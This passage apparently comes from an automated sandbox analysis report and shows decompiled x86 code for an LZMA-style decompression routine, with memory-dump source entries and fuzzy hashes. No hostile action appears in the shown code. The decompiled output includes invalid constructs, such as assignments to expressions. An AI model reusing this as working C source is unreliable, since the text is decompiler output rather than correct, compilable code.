              							__eax = __eax / _v120;
              							__edx = _t280;
              							__eax = _v108;
              							_v100 = _v100 + 1;
              							_v108 = _v108 + 1;
              							_t289 =  &_v104;
              							 *_t289 = _v104 - 1;
              							__eflags =  *_t289;
              							 *_v108 = __cl;
              							L82:
              							_v24 = __edx;
              							goto L83;
              						case 0x1c:
              							while(1) {
              								L126:
              								__eflags = _v104;
              								if(_v104 == 0) {
              									break;
              								}
              								__eax = _v24;
              								__eax = _v24 - _v48;
              								__eflags = __eax - _v120;
              								if(__eax >= _v120) {
              									__eax = __eax + _v120;
              									__eflags = __eax;
              								}
              								__edx = _v12;
              								__cl =  *(__edx + __eax);
              								__eax = _v24;
              								_v96 = __cl;
              								 *(__edx + __eax) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t420 = __eax % _v120;
              								__eax = __eax / _v120;
              								__edx = _t420;
              								__eax = _v108;
              								_v108 = _v108 + 1;
              								_v104 = _v104 - 1;
              								_v52 = _v52 - 1;
              								__eflags = _v52;
              								 *_v108 = __cl;
              								_v24 = _t420;
              								if(_v52 > 0) {
              									continue;
              								} else {
              									L83:
              									_v140 = 2;
              									goto L3;
              								}
              							}
              							_v140 = 0x1c;
              							L173:
              							_push(0x22);
              							_pop(_t574);
              							memcpy(_v148,  &_v140, _t574 << 2);
              							return 0;
              					}
              				}
              				L174:
              				_t538 = _t537 | 0xffffffff;
              				return _t538;
              			}











































              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
              • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406EFA() {
              				signed int _t539;
              				unsigned short _t540;
              				signed int _t541;
              				void _t542;
              				signed int _t543;
              				signed int _t544;
              				signed int _t573;
              				signed int _t576;
              				signed int _t597;
              				signed int* _t614;
              				void* _t621;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t621 - 0x40) != 1) {
              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
              						_t539 =  *(_t621 - 4) + 0x664;
              						 *(_t621 - 0x58) = _t539;
              						goto L68;
              					} else {
              						 *(__ebp - 0x84) = 8;
              						while(1) {
              							L132:
              							 *(_t621 - 0x54) = _t614;
              							while(1) {
              								L133:
              								_t540 =  *_t614;
              								_t597 = _t540 & 0x0000ffff;
              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
              								if( *(_t621 - 0xc) >= _t573) {
              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
              									 *(_t621 - 0x40) = 1;
              									_t541 = _t540 - (_t540 >> 5);
              									 *_t614 = _t541;
              								} else {
              									 *(_t621 - 0x10) = _t573;
              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
              								}
              								if( *(_t621 - 0x10) >= 0x1000000) {
              									goto L139;
              								}
              								L137:
              								if( *(_t621 - 0x6c) == 0) {
              									 *(_t621 - 0x88) = 5;
              									L170:
              									_t576 = 0x22;
              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
              									_t544 = 0;
              									L172:
              									return _t544;
              								}
              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
              								L139:
              								_t542 =  *(_t621 - 0x84);
              								while(1) {
              									 *(_t621 - 0x88) = _t542;
              									while(1) {
              										L1:
              										_t543 =  *(_t621 - 0x88);
              										if(_t543 > 0x1c) {
              											break;
              										}
              										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
              											case 0:
              												if( *(_t621 - 0x6c) == 0) {
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              												_t543 =  *( *(_t621 - 0x70));
              												if(_t543 > 0xe1) {
              													goto L171;
              												}
              												_t547 = _t543 & 0x000000ff;
              												_push(0x2d);
              												asm("cdq");
              												_pop(_t578);
              												_push(9);
              												_pop(_t579);
              												_t617 = _t547 / _t578;
              												_t549 = _t547 % _t578 & 0x000000ff;
              												asm("cdq");
              												_t612 = _t549 % _t579 & 0x000000ff;
              												 *(_t621 - 0x3c) = _t612;
              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
              												_t620 = (0x300 << _t612 + _t617) + 0x736;
              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
              													L10:
              													if(_t620 == 0) {
              														L12:
              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              														goto L15;
              													} else {
              														goto L11;
              													}
              													do {
              														L11:
              														_t620 = _t620 - 1;
              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
              													} while (_t620 != 0);
              													goto L12;
              												}
              												if( *(_t621 - 4) != 0) {
              													GlobalFree( *(_t621 - 4));
              												}
              												_t543 = GlobalAlloc(0x40, 0x600); // executed
              												 *(_t621 - 4) = _t543;
              												if(_t543 == 0) {
              													goto L171;
              												} else {
              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
              													goto L10;
              												}
              											case 1:
              												L13:
              												__eflags =  *(_t621 - 0x6c);
              												if( *(_t621 - 0x6c) == 0) {
              													 *(_t621 - 0x88) = 1;
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              												_t45 = _t621 - 0x48;
              												 *_t45 =  *(_t621 - 0x48) + 1;
              												__eflags =  *_t45;
              												L15:
              												if( *(_t621 - 0x48) < 4) {
              													goto L13;
              												}
              												_t555 =  *(_t621 - 0x40);
              												if(_t555 ==  *(_t621 - 0x74)) {
              													L20:
              													 *(_t621 - 0x48) = 5;
              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
              													goto L23;
              												}
              												 *(_t621 - 0x74) = _t555;
              												if( *(_t621 - 8) != 0) {
              													GlobalFree( *(_t621 - 8));
              												}
              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
              												 *(_t621 - 8) = _t543;
              												if(_t543 == 0) {
              													goto L171;
              												} else {
              													goto L20;
              												}
              											case 2:
              												L24:
              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
              												 *(_t621 - 0x84) = 6;
              												 *(_t621 - 0x4c) = _t562;
              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
              												goto L132;
              											case 3:
              												L21:
              												__eflags =  *(_t621 - 0x6c);
              												if( *(_t621 - 0x6c) == 0) {
              													 *(_t621 - 0x88) = 3;
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												_t67 = _t621 - 0x70;
              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
              												__eflags =  *_t67;
              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
              												L23:
              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
              												if( *(_t621 - 0x48) != 0) {
              													goto L21;
              												}
              												goto L24;
              											case 4:
              												L133:
              												_t540 =  *_t614;
              												_t597 = _t540 & 0x0000ffff;
              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
              												if( *(_t621 - 0xc) >= _t573) {
              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
              													 *(_t621 - 0x40) = 1;
              													_t541 = _t540 - (_t540 >> 5);
              													 *_t614 = _t541;
              												} else {
              													 *(_t621 - 0x10) = _t573;
              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
              												}
              												if( *(_t621 - 0x10) >= 0x1000000) {
              													goto L139;
              												}
              											case 5:
              												goto L137;
              											case 6:
              												__edx = 0;
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x34) = 1;
              													 *(__ebp - 0x84) = 7;
              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
              												__esi =  *(__ebp - 0x60);
              												__cl = 8;
              												__cl = 8 -  *(__ebp - 0x3c);
              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              												__ecx =  *(__ebp - 0x3c);
              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              												__ecx =  *(__ebp - 4);
              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              												__eflags =  *(__ebp - 0x38) - 4;
              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												if( *(__ebp - 0x38) >= 4) {
              													__eflags =  *(__ebp - 0x38) - 0xa;
              													if( *(__ebp - 0x38) >= 0xa) {
              														_t98 = __ebp - 0x38;
              														 *_t98 =  *(__ebp - 0x38) - 6;
              														__eflags =  *_t98;
              													} else {
              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              													}
              												} else {
              													 *(__ebp - 0x38) = 0;
              												}
              												__eflags =  *(__ebp - 0x34) - __edx;
              												if( *(__ebp - 0x34) == __edx) {
              													__ebx = 0;
              													__ebx = 1;
              													goto L61;
              												} else {
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__ecx =  *(__ebp - 8);
              													__ebx = 0;
              													__ebx = 1;
              													__al =  *((intOrPtr*)(__eax + __ecx));
              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              													goto L41;
              												}
              											case 7:
              												goto L0;
              											case 8:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xa;
              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              												} else {
              													__eax =  *(__ebp - 0x38);
              													__ecx =  *(__ebp - 4);
              													__eax =  *(__ebp - 0x38) + 0xf;
              													 *(__ebp - 0x84) = 9;
              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              												}
              												while(1) {
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              											case 9:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													goto L89;
              												}
              												__eflags =  *(__ebp - 0x60);
              												if( *(__ebp - 0x60) == 0) {
              													goto L171;
              												}
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
              												__eflags = _t258;
              												0 | _t258 = _t258 + _t258 + 9;
              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
              												goto L75;
              											case 0xa:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xb;
              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              													while(1) {
              														L132:
              														 *(_t621 - 0x54) = _t614;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x28);
              												goto L88;
              											case 0xb:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__ecx =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x20);
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												} else {
              													__eax =  *(__ebp - 0x24);
              												}
              												__ecx =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												L88:
              												__ecx =  *(__ebp - 0x2c);
              												 *(__ebp - 0x2c) = __eax;
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												L89:
              												__eax =  *(__ebp - 4);
              												 *(__ebp - 0x80) = 0x15;
              												__eax =  *(__ebp - 4) + 0xa68;
              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              												goto L68;
              											case 0xc:
              												L99:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xc;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t334 = __ebp - 0x70;
              												 *_t334 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t334;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												__eax =  *(__ebp - 0x2c);
              												goto L101;
              											case 0xd:
              												L37:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xd;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t122 = __ebp - 0x70;
              												 *_t122 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t122;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L39:
              												__eax =  *(__ebp - 0x40);
              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              													goto L48;
              												}
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													goto L54;
              												}
              												L41:
              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              												__ecx =  *(__ebp - 0x58);
              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              												 *(__ebp - 0x48) = __eax;
              												__eax = __eax + 1;
              												__eax = __eax << 8;
              												__eax = __eax + __ebx;
              												__esi =  *(__ebp - 0x58) + __eax * 2;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edx = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													 *(__ebp - 0x40) = 1;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													__ebx = __ebx + __ebx + 1;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edx;
              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L39;
              												} else {
              													goto L37;
              												}
              											case 0xe:
              												L46:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xe;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t156 = __ebp - 0x70;
              												 *_t156 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t156;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												while(1) {
              													L48:
              													__eflags = __ebx - 0x100;
              													if(__ebx >= 0x100) {
              														break;
              													}
              													__eax =  *(__ebp - 0x58);
              													__edx = __ebx + __ebx;
              													__ecx =  *(__ebp - 0x10);
              													__esi = __edx + __eax;
              													__ecx =  *(__ebp - 0x10) >> 0xb;
              													__ax =  *__esi;
              													 *(__ebp - 0x54) = __esi;
              													__edi = __ax & 0x0000ffff;
              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              													__eflags =  *(__ebp - 0xc) - __ecx;
              													if( *(__ebp - 0xc) >= __ecx) {
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              														__cx = __ax;
              														_t170 = __edx + 1; // 0x1
              														__ebx = _t170;
              														__cx = __ax >> 5;
              														__eflags = __eax;
              														 *__esi = __ax;
              													} else {
              														 *(__ebp - 0x10) = __ecx;
              														0x800 = 0x800 - __edi;
              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              														__ebx = __ebx + __ebx;
              														 *__esi = __cx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														continue;
              													} else {
              														goto L46;
              													}
              												}
              												L54:
              												_t173 = __ebp - 0x34;
              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              												__eflags =  *_t173;
              												goto L55;
              											case 0xf:
              												L58:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xf;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t203 = __ebp - 0x70;
              												 *_t203 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t203;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L60:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													L55:
              													__al =  *(__ebp - 0x44);
              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              													goto L56;
              												}
              												L61:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t217 = __edx + 1; // 0x1
              													__ebx = _t217;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L60;
              												} else {
              													goto L58;
              												}
              											case 0x10:
              												L109:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x10;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t365 = __ebp - 0x70;
              												 *_t365 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t365;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												goto L111;
              											case 0x11:
              												L68:
              												_t614 =  *(_t621 - 0x58);
              												 *(_t621 - 0x84) = 0x12;
              												while(1) {
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              											case 0x12:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 0x58);
              													 *(__ebp - 0x84) = 0x13;
              													__esi =  *(__ebp - 0x58) + 2;
              													while(1) {
              														L132:
              														 *(_t621 - 0x54) = _t614;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x4c);
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												__eflags = __eax;
              												__eax =  *(__ebp - 0x58) + __eax + 4;
              												goto L130;
              											case 0x13:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													_t469 = __ebp - 0x58;
              													 *_t469 =  *(__ebp - 0x58) + 0x204;
              													__eflags =  *_t469;
              													 *(__ebp - 0x30) = 0x10;
              													 *(__ebp - 0x40) = 8;
              													L144:
              													 *(__ebp - 0x7c) = 0x14;
              													goto L145;
              												}
              												__eax =  *(__ebp - 0x4c);
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												 *(__ebp - 0x30) = 8;
              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              												L130:
              												 *(__ebp - 0x58) = __eax;
              												 *(__ebp - 0x40) = 3;
              												goto L144;
              											case 0x14:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              												__eax =  *(__ebp - 0x80);
              												 *(_t621 - 0x88) = _t542;
              												goto L1;
              											case 0x15:
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xb;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              												goto L120;
              											case 0x16:
              												__eax =  *(__ebp - 0x30);
              												__eflags = __eax - 4;
              												if(__eax >= 4) {
              													_push(3);
              													_pop(__eax);
              												}
              												__ecx =  *(__ebp - 4);
              												 *(__ebp - 0x40) = 6;
              												__eax = __eax << 7;
              												 *(__ebp - 0x7c) = 0x19;
              												 *(__ebp - 0x58) = __eax;
              												goto L145;
              											case 0x17:
              												L145:
              												__eax =  *(__ebp - 0x40);
              												 *(__ebp - 0x50) = 1;
              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
              												goto L149;
              											case 0x18:
              												L146:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x18;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t484 = __ebp - 0x70;
              												 *_t484 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t484;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L148:
              												_t487 = __ebp - 0x48;
              												 *_t487 =  *(__ebp - 0x48) - 1;
              												__eflags =  *_t487;
              												L149:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__ecx =  *(__ebp - 0x40);
              													__ebx =  *(__ebp - 0x50);
              													0 = 1;
              													__eax = 1 << __cl;
              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
              													__eax =  *(__ebp - 0x7c);
              													 *(__ebp - 0x44) = __ebx;
              													while(1) {
              														 *(_t621 - 0x88) = _t542;
              														goto L1;
              													}
              												}
              												__eax =  *(__ebp - 0x50);
